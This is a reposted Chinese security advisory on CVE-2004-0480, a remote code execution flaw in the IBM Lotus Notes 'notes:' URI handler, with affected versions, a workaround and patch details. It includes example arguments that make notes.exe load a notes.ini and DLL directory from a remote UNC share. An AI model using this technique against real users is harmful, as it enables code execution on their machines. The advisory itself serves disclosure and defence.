IBM Lotus Notes URI处理器远程代码执行漏洞

2008-04-09 04:26:11来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

IBM Lotus Notes URI处理器远程代码执行漏洞

发布日期:2004-06-23
更新日期:2004-06-28

受影响系统:
IBM Lotus Notes 6.5
IBM Lotus Notes 6.0.1
IBM Lotus Notes 6.0
IBM Lotus Notes 5.0.12
不受影响系统:
IBM Lotus Notes 6.5.2
IBM Lotus Notes 6.0.4
描述:
BUGTRAQ ID: 10600
CVE(CAN) ID: CVE-2004-0480

Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。

Lotus Notes URI处理器对输入缺少正确过滤,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,以进程权限在系统上执行任意命令。

在安装Lotus Notes会增加如下键值:

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

包含如下值:

C:\Program Files\lotus\notes\notes.exe %1

这可以使Lotus Notes程序notes.exe会打开"notes:"的URI请求,而配置文件notes.ini可以在命令行中指定,这个参数可以指定UNC网络共享形式的文件路径,如下面一个可以指定从远程装载配置文件:

notes.exe =\\10.0.0.1\notes\notes.ini

而notes.ini文件允许指定Notes数据目录,notes.exe程序利用此目录装载DLL文件,此参数也可以指定以UNC网络共享形式的文件路径,如:

[Notes] Directory=\\10.0.0.1\\notes

由于对来自"notes:" URI请求的传递给notes.exe参数缺少充分的字符过滤,攻击者可以诱使用户以指定的note.ini文件来启动Lotus Notes,并指定用户控制下的数据目录,当notes.exe启动时恶意程序以当前用户进程权限执行。

<*来源:iDEFENSE Security Advisory (labs@idefense.com)

链接:http://www.idefense.com/application/poi/display?id=111&type=vulnerabilities&flashstatus=true
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 从注册表中删除"notes:" URI的处理器注册值。

厂商补丁:

IBM
---
Domino 6.0.4和6.5.2已经修补此漏洞,建议用户联系厂商升级。

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:BT Voyager 2000 Wireless ADSL Router SNMP共同体串信息泄露漏

下一篇:TildeSlash Monit验证处理远程缓冲区溢出漏洞